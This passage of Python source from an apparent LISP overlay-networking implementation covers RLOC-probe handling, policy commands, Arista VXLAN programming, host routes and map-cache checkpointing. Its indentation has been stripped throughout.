lprint("Suppress probe to duplicate RLOC {} for {}". \
format(red(addr_str, False), e))
#
# Copy last-rloc send probe timer, so all EIDs using the
# same RLOC can have sync'ed rtts.
#
parent_rloc.last_rloc_probe = last_rloc.last_rloc_probe
continue
#endif
#endif
nh = None
rloc = None
while (True):
rloc = parent_rloc if rloc == None else rloc.next_rloc
if (rloc == None): break
#
# First check if next-hop/interface is up for egress multi-
# homing.
#
if (rloc.rloc_next_hop != None):
if (rloc.rloc_next_hop not in default_next_hops):
if (rloc.up_state()):
d, n = rloc.rloc_next_hop
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
#endif
unreach = bold("unreachable", False)
lprint("Next-hop {}({}) for RLOC {} is {}".format(n, d,
red(addr_str, False), unreach))
continue
#endif
#endif
#
# Send RLOC-probe to unreach-state RLOCs if down for a minute.
#
last = rloc.last_rloc_probe
delta = 0 if last == None else time.time() - last
if (rloc.unreach_state() and delta < LISP_RLOC_PROBE_INTERVAL):
lprint("Waiting for probe-reply from RLOC {}".format( \
red(addr_str, False)))
continue
#endif
#
# Check to see if we are in nonce-echo mode and no echo has
# been returned.
#
echo_nonce = lisp_get_echo_nonce(None, addr_str)
if (echo_nonce and echo_nonce.request_nonce_timeout()):
rloc.state = LISP_RLOC_NO_ECHOED_NONCE_STATE
rloc.last_state_change = lisp_get_timestamp()
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, nonce-echo failed".format( \
red(addr_str, False), unreach))
lisp_update_rtr_updown(rloc.rloc, False)
continue
#endif
#
# Suppress sending an RLOC-probe if we just received a nonce-echo
# in the last minute.
#
if (echo_nonce and echo_nonce.recently_echoed()):
lprint(("Suppress RLOC-probe to {}, nonce-echo " + \
"received").format(red(addr_str, False)))
continue
#endif
#
# Check if we have not received a RLOC-probe reply for one
# timer interval. If not, put RLOC state in "unreach-state".
#
if (rloc.last_rloc_probe != None):
last = rloc.last_rloc_probe_reply
if (last == None): last = 0
delta = time.time() - last
if (rloc.up_state() and \
delta >= LISP_RLOC_PROBE_REPLY_WAIT):
rloc.state = LISP_RLOC_UNREACH_STATE
rloc.last_state_change = lisp_get_timestamp()
lisp_update_rtr_updown(rloc.rloc, False)
unreach = bold("unreachable", False)
lprint("RLOC {} went {}, probe it".format( \
red(addr_str, False), unreach))
lisp_mark_rlocs_for_other_eids(values)
#endif
#endif
rloc.last_rloc_probe = lisp_get_timestamp()
reach = "" if rloc.unreach_state() == False else " unreachable"
#
# Send Map-Request RLOC-probe. We may have to send one for each
# egress interface to the same RLOC address. Install host
# route in RLOC so we can direct the RLOC-probe on an egress
# interface.
#
nh_str = ""
n = None
if (rloc.rloc_next_hop != None):
d, n = rloc.rloc_next_hop
lisp_install_host_route(addr_str, n, True)
nh_str = ", send on nh {}({})".format(n, d)
#endif
#
# Print integrated log message before sending RLOC-probe.
#
rtt = rloc.print_rloc_probe_rtt()
astr = addr_str
if (rloc.translated_port != 0):
astr += ":{}".format(rloc.translated_port)
#endif
astr = red(astr, False)
if (rloc.rloc_name != None):
astr += " (" + blue(rloc.rloc_name, False) + ")"
#endif
lprint("Send {}{} {}, last rtt: {}{}".format(probe, reach,
astr, rtt, nh_str))
#
# If we are doing multiple egress interfaces, check for host
# routes. We don't want the ones we selected for forwarding to
# affect the path RLOC-probes go out in the following loop. We
# will restore the host route while waiting for RLOC-replies.
# Then we'll select a new host route based on best RTT.
#
if (rloc.rloc_next_hop != None):
nh = lisp_get_host_route_next_hop(addr_str)
if (nh): lisp_install_host_route(addr_str, nh, False)
#endif
#
# Might be first time and other RLOCs on the chain may not
# have RLOC address. Copy now.
#
if (rloc.rloc.is_null()):
rloc.rloc.copy_address(parent_rloc.rloc)
#endif
#
# Send RLOC-probe Map-Request.
#
seid = None if (group.is_null()) else eid
deid = eid if (group.is_null()) else group
lisp_send_map_request(lisp_sockets, 0, seid, deid, rloc)
last_rloc = parent_rloc
#
# Remove installed host route.
#
if (n): lisp_install_host_route(addr_str, n, False)
#endwhile
#
# Reinstall host route for forwarding.
#
if (nh): lisp_install_host_route(addr_str, nh, True)
#
# Send 10 RLOC-probes and then sleep for 20 ms.
#
count += 1
if ((count % 10) == 0): time.sleep(0.020)
#endfor
#endfor
lprint("---------- End RLOC Probing ----------")
return
#enddef
#
# lisp_update_rtr_updown
#
# The lisp-itr process will send an IPC message to the lisp-etr process for
# the RLOC-probe status change for an RTR.
#
def lisp_update_rtr_updown(rtr, updown):
global lisp_ipc_socket
#
# This is only done on an ITR.
#
if (lisp_i_am_itr == False): return
#
# When the xtr-parameter indicates to register all RTRs, we are doing it
# conditionally so we don't care about the status. Suppress IPC messages.
#
if (lisp_register_all_rtrs): return
rtr_str = rtr.print_address_no_iid()
#
# Check if the RTR address is in the RTR-list the lisp-itr process learned
# from the map-server.
#
if (rtr_str not in lisp_rtr_list): return
updown = "up" if updown else "down"
lprint("Send ETR IPC message, RTR {} has done {}".format(
red(rtr_str, False), bold(updown, False)))
#
# Build IPC message.
#
ipc = "rtr%{}%{}".format(rtr_str, updown)
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#enddef
#
# lisp_process_rloc_probe_reply
#
# We have received a RLOC-probe Map-Reply, process it.
#
def lisp_process_rloc_probe_reply(rloc_entry, source, port, map_reply, ttl,
mrloc):
rloc = rloc_entry.rloc
nonce = map_reply.nonce
hc = map_reply.hop_count
probe = bold("RLOC-probe reply", False)
map_reply_addr = rloc.print_address_no_iid()
source_addr = source.print_address_no_iid()
pl = lisp_rloc_probe_list
jt = rloc_entry.json.json_string if rloc_entry.json else None
ts = lisp_get_timestamp()
#
# If this RLOC-probe reply is in response to a RLOC-probe request to a
# multicast RLOC, then store all responses. Create a lisp_rloc() for new
# entries.
#
if (mrloc != None):
multicast_rloc = mrloc.rloc.print_address_no_iid()
if (map_reply_addr not in mrloc.multicast_rloc_probe_list):
nrloc = copy.deepcopy(mrloc)
nrloc.rloc.copy_address(rloc)
nrloc.multicast_rloc_probe_list = {}
mrloc.multicast_rloc_probe_list[map_reply_addr] = nrloc
#endif
nrloc = mrloc.multicast_rloc_probe_list[map_reply_addr]
nrloc.last_rloc_probe_nonce = mrloc.last_rloc_probe_nonce
nrloc.last_rloc_probe = mrloc.last_rloc_probe
r, eid, group = lisp_rloc_probe_list[multicast_rloc][0]
nrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
mrloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
return
#endif
#
# If we can't find RLOC address from the Map-Reply in the probe-list,
# maybe the same ETR is sending sourcing from a different address. Check
# that address in the probe-list.
#
addr = map_reply_addr
if (addr not in pl):
addr += ":" + str(port)
if (addr not in pl):
addr = source_addr
if (addr not in pl):
addr += ":" + str(port)
lprint(" Received unsolicited {} from {}/{}, port {}". \
format(probe, red(map_reply_addr, False), red(source_addr,
False), port))
return
#endif
#endif
#endif
#
# Look for RLOC in the RLOC-probe list for EID tuple and fix-up stored
# RLOC-probe state.
#
for rloc, eid, group in lisp_rloc_probe_list[addr]:
if (lisp_i_am_rtr):
if (rloc.translated_port != 0 and rloc.translated_port != port):
continue
#endif
#endif
rloc.process_rloc_probe_reply(ts, nonce, eid, group, hc, ttl, jt)
#endfor
return
#enddef
#
# lisp_db_list_length
#
# Returns the number of entries that need to be registered. This will include
# static and dynamic EIDs.
#
def lisp_db_list_length():
count = 0
for db in lisp_db_list:
count += len(db.dynamic_eids) if db.dynamic_eid_configured() else 1
count += len(db.eid.iid_list)
#endfor
return(count)
#enddef
#
# lisp_is_myeid
#
# Return true if supplied EID is an EID supported by this ETR. That means a
# longest match lookup is done.
#
def lisp_is_myeid(eid):
for db in lisp_db_list:
if (eid.is_more_specific(db.eid)): return(True)
#endfor
return(False)
#enddef
#
# lisp_format_macs
#
# Take two MAC address strings and format them with dashes and place them in
# a format string "0000-1111-2222 -> 3333-4444-5555" for displaying in
# lisp.dprint().
#
def lisp_format_macs(sa, da):
sa = sa[0:4] + "-" + sa[4:8] + "-" + sa[8:12]
da = da[0:4] + "-" + da[4:8] + "-" + da[8:12]
return("{} -> {}".format(sa, da))
#enddef
#
# lisp_get_echo_nonce
#
# Get lisp_nonce_echo() state from lisp_nonce_echo_list{}.
#
def lisp_get_echo_nonce(rloc, rloc_str):
if (lisp_nonce_echoing == False): return(None)
if (rloc): rloc_str = rloc.print_address_no_iid()
echo_nonce = None
if (rloc_str in lisp_nonce_echo_list):
echo_nonce = lisp_nonce_echo_list[rloc_str]
#endif
return(echo_nonce)
#enddef
#
# lisp_decode_dist_name
#
# When we have reached an AFI=17 in an EID or RLOC record, return the
# distinguished name, and new position of packet.
#
def lisp_decode_dist_name(packet):
count = 0
dist_name = b""
while(packet[0:1] != b"\x00"):
if (count == 255): return([None, None])
dist_name += packet[0:1]
packet = packet[1::]
count += 1
#endwhile
packet = packet[1::]
return(packet, dist_name.decode())
#enddef
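#
# Example (illustrative): a distinguished-name is a null-terminated string,
# so for a packet buffer b"jdoe-xtr\x00<rest-of-packet>" this returns the
# buffer following the null byte along with the string "jdoe-xtr".
#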
#
# lisp_write_flow_log
#
# The supplied flow_log variable is an array of flow entries; the last
# element of each entry is a lisp_packet and the first three elements (a
# timestamp plus flow details) are passed to lisp_packet.print_flow(). This
# function is called and run in its own thread and then exits.
#
def lisp_write_flow_log(flow_log):
f = open("./logs/lisp-flow.log", "a")
count = 0
for flow in flow_log:
packet = flow[3]
flow_str = packet.print_flow(flow[0], flow[1], flow[2])
f.write(flow_str)
count += 1
#endfor
f.close()
del(flow_log)
count = bold(str(count), False)
lprint("Wrote {} flow entries to ./logs/lisp-flow.log".format(count))
return
#enddef
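#
# The caller hands off the accumulated array and starts a fresh one so the
# forwarding path never blocks on file I/O. A typical (illustrative)
# hand-off:
#
#   threading.Thread(target=lisp_write_flow_log, args=[flow_log]).start()
#   flow_log = []
#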
#
# lisp_policy_command
#
# Configure "lisp policy" commands for all processes that need it.
#
def lisp_policy_command(kv_pair):
p = lisp_policy("")
set_iid = None
match_set = []
for i in range(len(kv_pair["datetime-range"])):
match_set.append(lisp_policy_match())
#endfor
for kw in list(kv_pair.keys()):
value = kv_pair[kw]
#
# Check for match parameters.
#
if (kw == "instance-id"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
match.source_eid.instance_id = int(v)
match.dest_eid.instance_id = int(v)
#endfor
#endif
if (kw == "source-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.source_eid == None):
match.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.source_eid.instance_id
match.source_eid.store_prefix(v)
match.source_eid.instance_id = iid
#endfor
#endif
if (kw == "destination-eid"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
if (match.dest_eid == None):
match.dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
iid = match.dest_eid.instance_id
match.dest_eid.store_prefix(v)
match.dest_eid.instance_id = iid
#endfor
#endif
if (kw == "source-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.source_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.source_rloc.store_prefix(v)
#endfor
#endif
if (kw == "destination-rloc"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.dest_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
match.dest_rloc.store_prefix(v)
#endfor
#endif
if (kw == "rloc-record-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rloc_record_name = v
#endfor
#endif
if (kw == "geo-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.geo_name = v
#endfor
#endif
if (kw == "elp-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.elp_name = v
#endfor
#endif
if (kw == "rle-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.rle_name = v
#endfor
#endif
if (kw == "json-name"):
for i in range(len(match_set)):
v = value[i]
if (v == ""): continue
match = match_set[i]
match.json_name = v
#endfor
#endif
if (kw == "datetime-range"):
for i in range(len(match_set)):
v = value[i]
match = match_set[i]
if (v == ""): continue
l = lisp_datetime(v[0:19])
u = lisp_datetime(v[19::])
if (l.valid_datetime() and u.valid_datetime()):
match.datetime_lower = l
match.datetime_upper = u
#endif
#endfor
#endif
#
# Check for set parameters.
#
if (kw == "set-action"):
p.set_action = value
#endif
if (kw == "set-record-ttl"):
p.set_record_ttl = int(value)
#endif
if (kw == "set-instance-id"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
set_iid = int(value)
p.set_source_eid.instance_id = set_iid
p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-source-eid"):
if (p.set_source_eid == None):
p.set_source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_source_eid.store_prefix(value)
if (set_iid != None): p.set_source_eid.instance_id = set_iid
#endif
if (kw == "set-destination-eid"):
if (p.set_dest_eid == None):
p.set_dest_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
#endif
p.set_dest_eid.store_prefix(value)
if (set_iid != None): p.set_dest_eid.instance_id = set_iid
#endif
if (kw == "set-rloc-address"):
p.set_rloc_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
p.set_rloc_address.store_address(value)
#endif
if (kw == "set-rloc-record-name"):
p.set_rloc_record_name = value
#endif
if (kw == "set-elp-name"):
p.set_elp_name = value
#endif
if (kw == "set-geo-name"):
p.set_geo_name = value
#endif
if (kw == "set-rle-name"):
p.set_rle_name = value
#endif
if (kw == "set-json-name"):
p.set_json_name = value
#endif
if (kw == "policy-name"):
p.policy_name = value
#endif
#endfor
#
# Store match clauses and policy.
#
p.match_clauses = match_set
p.save_policy()
return
#enddef
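#
# Illustrative kv_pair layout for two match clauses: the match keywords
# arrive as parallel arrays sized by "datetime-range" ("" means the clause
# did not supply that parameter), while the set keywords arrive as scalars:
#
# kv_pair = {
#     "policy-name"    : "policy1",
#     "datetime-range" : ["", ""],
#     "instance-id"    : ["1000", ""],
#     "source-eid"     : ["10.0.0.0/8", "192.168.0.0/16"],
#     "set-action"     : "drop"
# }
#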
lisp_policy_commands = {
"lisp policy" : [lisp_policy_command, {
"policy-name" : [True],
"match" : [],
"instance-id" : [True, 0, 0xffffffff],
"source-eid" : [True],
"destination-eid" : [True],
"source-rloc" : [True],
"destination-rloc" : [True],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"datetime-range" : [True],
"set-action" : [False, "process", "drop"],
"set-record-ttl" : [True, 0, 0x7fffffff],
"set-instance-id" : [True, 0, 0xffffffff],
"set-source-eid" : [True],
"set-destination-eid" : [True],
"set-rloc-address" : [True],
"set-rloc-record-name" : [True],
"set-elp-name" : [True],
"set-geo-name" : [True],
"set-rle-name" : [True],
"set-json-name" : [True] } ]
}
#
# lisp_send_to_arista
#
# Send supplied CLI command to Arista so it can be configured via its design
# rules.
#
def lisp_send_to_arista(command, interface):
interface = "" if (interface == None) else "interface " + interface
cmd_str = command
if (interface != ""): cmd_str = interface + ": " + cmd_str
lprint("Send CLI command '{}' to hardware".format(cmd_str))
commands = '''
enable
configure
{}
{}
'''.format(interface, command)
os.system("FastCli -c '{}'".format(commands))
return
#enddef
#
# lisp_arista_is_alive
#
# Ask hardware if EID-prefix is alive. Return True if so.
#
def lisp_arista_is_alive(prefix):
cmd = "enable\nsh plat trident l3 software routes {}\n".format(prefix)
output = getoutput("FastCli -c '{}'".format(cmd))
#
# Skip over header line.
#
output = output.split("\n")[1]
flag = output.split(" ")
flag = flag[-1].replace("\r", "")
#
# Last column has "Y" or "N" for hit bit.
#
return(flag == "Y")
#enddef
#
# lisp_program_vxlan_hardware
#
# This function is going to populate hardware that can do VXLAN encapsulation.
# It will add an IPv4 route via the kernel pointing to a next-hop on a
# VLAN interface that is being bridged to other potential VTEPs.
#
# The responsibility of this routine is to do the following programming:
#
# route add <eid-prefix> <next-hop>
# arp -s <next-hop> <mac-address>
#
# to the kernel and to do this Arista specific command:
#
# mac address-table static <mac-address> vlan 4094 interface vxlan 1
# vtep <vtep-address>
#
# Assumptions are:
#
# (1) Next-hop address is on the subnet for interface vlan4094.
# (2) VXLAN routing is already setup and will bridge <mac-address> to
# the VTEP address this function supplies.
# (3) A "ip virtual-router mac-address" is configured that will match the
# algorithmic mapping this function is doing between VTEP's IP address
# and the MAC address it will listen on to do VXLAN routing.
#
# The required configuration on the VTEPs are:
#
# vlan 4094
# interface vlan4094
# ip address ... ! <next-hop> above point to subnet
#
# interface Vxlan1
# vxlan source-interface Loopback0
# vxlan vlan 4094 vni 10000
# vxlan flood vtep add 17.17.17.17 ! any address to bring up vlan4094
#
# int loopback0
# ip address a.b.c.d/m ! this is the VTEP or RLOC <vtep-address>
#
# ip virtual-router mac-address 0000.00bb.ccdd
#
def lisp_program_vxlan_hardware(mc):
#
# For now, only do this on an Arista system. There isn't a python
# specific signature so just look to see if /persist/local/lispers.net
# exists.
#
if (os.path.exists("/persist/local/lispers.net") == False): return
#
# If no RLOCs, just return. Otherwise program the first RLOC.
#
if (len(mc.best_rloc_set) == 0): return
#
# Get EID-prefix and RLOC (VTEP address) in string form.
#
eid_prefix = mc.eid.print_prefix_no_iid()
rloc = mc.best_rloc_set[0].rloc.print_address_no_iid()
#
# Check to see if route is already present. If so, just return.
#
route = getoutput("ip route get {} | egrep vlan4094".format( \
eid_prefix))
if (route != ""):
lprint("Route {} already in hardware: '{}'".format( \
green(eid_prefix, False), route))
return
#endif
#
# Look for a vxlan interface and a vlan4094 interface. If they do not
# exist, issue message and return. If we don't have an IP address on
# vlan4094, then exit as well.
#
ifconfig = getoutput("ifconfig | egrep 'vxlan|vlan4094'")
if (ifconfig.find("vxlan") == -1):
lprint("No VXLAN interface found, cannot program hardware")
return
#endif
if (ifconfig.find("vlan4094") == -1):
lprint("No vlan4094 interface found, cannot program hardware")
return
#endif
ipaddr = getoutput("ip addr | egrep vlan4094 | egrep inet")
if (ipaddr == ""):
lprint("No IP address found on vlan4094, cannot program hardware")
return
#endif
ipaddr = ipaddr.split("inet ")[1]
ipaddr = ipaddr.split("/")[0]
#
# Get a unique next-hop IP address on vlan4094's subnet. To be used as
# a handle to get VTEP's mac address. And then that VTEP's MAC address
# is a handle to tell VXLAN to encapsulate IP packet (with frame header)
# to the VTEP address.
#
arp_entries = []
arp_lines = getoutput("arp -i vlan4094").split("\n")
for line in arp_lines:
if (line.find("vlan4094") == -1): continue
if (line.find("(incomplete)") == -1): continue
nh = line.split(" ")[0]
arp_entries.append(nh)
#endfor
nh = None
local = ipaddr
ipaddr = ipaddr.split(".")
for i in range(1, 255):
ipaddr[3] = str(i)
addr = ".".join(ipaddr)
if (addr in arp_entries): continue
if (addr == local): continue
nh = addr
break
#endfor
if (nh == None):
lprint("Address allocation failed for vlan4094, cannot program " + \
"hardware")
return
#endif
#
# Derive MAC address from VTEP address and associate it with the next-hop
# address on vlan4094. This MAC address must be the MAC address on the
# foreign VTEP configured with "ip virtual-router mac-address <mac>".
#
rloc_octets = rloc.split(".")
octet1 = lisp_hex_string(int(rloc_octets[1])).zfill(2)
octet2 = lisp_hex_string(int(rloc_octets[2])).zfill(2)
octet3 = lisp_hex_string(int(rloc_octets[3])).zfill(2)
mac = "00:00:00:{}:{}:{}".format(octet1, octet2, octet3)
arista_mac = "0000.00{}.{}{}".format(octet1, octet2, octet3)
arp_command = "arp -i vlan4094 -s {} {}".format(nh, mac)
os.system(arp_command)
#
# Add VXLAN entry for MAC address.
#
vxlan_command = ("mac address-table static {} vlan 4094 " + \
"interface vxlan 1 vtep {}").format(arista_mac, rloc)
lisp_send_to_arista(vxlan_command, None)
#
# Add route now connecting: eid-prefix -> next-hop -> mac-address ->
# VTEP address.
#
route_command = "ip route add {} via {}".format(eid_prefix, nh)
os.system(route_command)
lprint("Hardware programmed with commands:")
route_command = route_command.replace(eid_prefix, green(eid_prefix, False))
lprint(" " + route_command)
lprint(" " + arp_command)
vxlan_command = vxlan_command.replace(rloc, red(rloc, False))
lprint(" " + vxlan_command)
return
#enddef
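#
# Example of the algorithmic mapping above (addresses made up): VTEP RLOC
# 11.22.33.44 yields next-hop ARP MAC 00:00:00:16:21:2c and Arista MAC
# 0000.0016.212c, i.e. the low three octets of the RLOC in hex.
#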
#
# lisp_clear_hardware_walk
#
# Remove EID-prefix from kernel.
#
def lisp_clear_hardware_walk(mc, parms):
prefix = mc.eid.print_prefix_no_iid()
os.system("ip route delete {}".format(prefix))
return([True, None])
#enddef
#
# lisp_clear_map_cache
#
# Just create a new lisp_cache data structure. But if we have to program
# hardware, traverse the map-cache.
#
def lisp_clear_map_cache():
global lisp_map_cache, lisp_rloc_probe_list
global lisp_crypto_keys_by_rloc_encap, lisp_crypto_keys_by_rloc_decap
global lisp_rtr_list, lisp_gleaned_groups
global lisp_no_map_request_rate_limit
clear = bold("User cleared", False)
count = lisp_map_cache.cache_count
lprint("{} map-cache with {} entries".format(clear, count))
if (lisp_program_hardware):
lisp_map_cache.walk_cache(lisp_clear_hardware_walk, None)
#endif
lisp_map_cache = lisp_cache()
#
# Clear rate-limiting temporarily.
#
lisp_no_map_request_rate_limit = lisp_get_timestamp()
#
# Need to clear the RLOC-probe list or else we'll have RLOC-probes
# create incomplete RLOC-records.
#
lisp_rloc_probe_list = {}
#
# Also clear the encap and decap lisp-crypto arrays.
#
lisp_crypto_keys_by_rloc_encap = {}
lisp_crypto_keys_by_rloc_decap = {}
#
# If we are an ITR, clear the RTR-list so a new set of default routes can
# be added when the next Info-Reply comes in.
#
lisp_rtr_list = {}
#
# Clear gleaned groups data structure.
#
lisp_gleaned_groups = {}
#
# Tell external data-plane.
#
lisp_process_data_plane_restart(True)
return
#enddef
#
# lisp_encapsulate_rloc_probe
#
# Input to this function is a RLOC-probe Map-Request and the NAT-traversal
# information for an ETR that sits behind a NAT. We need to get the RLOC-probe
# through the NAT so we have to data encapsulate it with a source port of 4341
# and a destination address and port that were translated by the NAT. That
# information is in the lisp_nat_info() class.
#
def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
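#
# Note: the "BBHIBBHII" pack above is a 20-byte IPv4 header (version/IHL,
# TOS, total-length, a zeroed 32-bit ident/flags/frag-offset field, TTL,
# protocol 17 for UDP, checksum, source, destination) and "HHHH" is the
# 8-byte UDP header with a zero source port and checksum.
#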
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface names of each next-hop for the IPv4 default in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
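#
# Example (illustrative): if the kernel has these routes installed:
#
#   default via 192.168.1.1 dev eth0
#   default via 192.168.2.1 dev eth1 metric 100
#
# this returns [["eth0", "192.168.1.1"]]; the second route is skipped
# because default routes with a metric are ignored.
#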
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return(checkpoint_list)
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return(checkpoint_list)
#enddef
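#
# Illustrative checkpoint entries in the format described above:
#
#   [1000]10.0.0.0/8 rloc 1.1.1.1 1 100, 2.2.2.2 2 50
#   [1000]10.1.0.0/16 rloc native-forward
#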
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Write an IPC record, in JSON format, to the lisp-ipc-data-plane named
# socket.
#
def lisp_write_to_dp_socket(entry):
try:
rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec.encode(), lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
